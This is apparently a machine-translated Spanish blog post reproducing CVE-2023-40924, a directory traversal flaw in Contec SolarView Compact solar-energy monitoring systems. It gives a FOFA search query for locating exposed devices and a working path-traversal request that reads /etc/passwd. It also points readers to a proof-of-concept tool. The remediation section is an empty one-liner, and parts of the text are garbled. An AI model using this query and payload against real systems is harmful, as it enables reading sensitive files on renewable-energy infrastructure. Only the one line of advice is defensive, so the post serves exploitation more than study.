Recurrencia de la vulnerabilidad de cruce de directorio CVE-2023-40924 en el sistema de medición de generación de energía fotovoltaica SolarView Compact de Japón
Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para realizar pruebas ilegales. Cualquier consecuencia y pérdida directa o indirecta causada por la difusión y el uso de la información o las herramientas proporcionadas en este artículo serán responsabilidad del propio usuario. consecuencias incurridas Las consecuencias adversas no tienen nada que ver con el autor del artículo. Este artículo es sólo para fines educativos.
1. Introducción al sistema
Contec es una empresa que se centra en informática integrada personalizada, automatización industrial y tecnologías de comunicación IoT. Contec SolarView Compact es un sistema de aplicaciones de Contec que se puede utilizar para monitoreo remoto del rendimiento, resolución de problemas, optimización del sistema y otras funciones para administrar de forma remota unidades de producción de energía renovable.
2. Descripción de la vulnerabilidad
Los atacantes aprovechan esta vulnerabilidad a través de downloader.php, y el parámetro del archivo se pasa a través del directorio para leer archivos confidenciales.
3. Versiones afectadas
SolarView compacto < 6,00
4. declaración de consulta fofa
cuerpo = “SolarView Compact” && título = “Arriba”
5. Recurrencia de la vulnerabilidad
El navegador presiona Enter directamente
para capturar el paquete BURP.
6.POC&EXP
/downloader.php?file=…/…/…/…/…/…/…/…/etc/passwd%00.jpg
Portal POC de Xiaolong [Actualizado]: Herramienta POC de Xiaolong
7. Sugerencias de reparación
No descargues al azar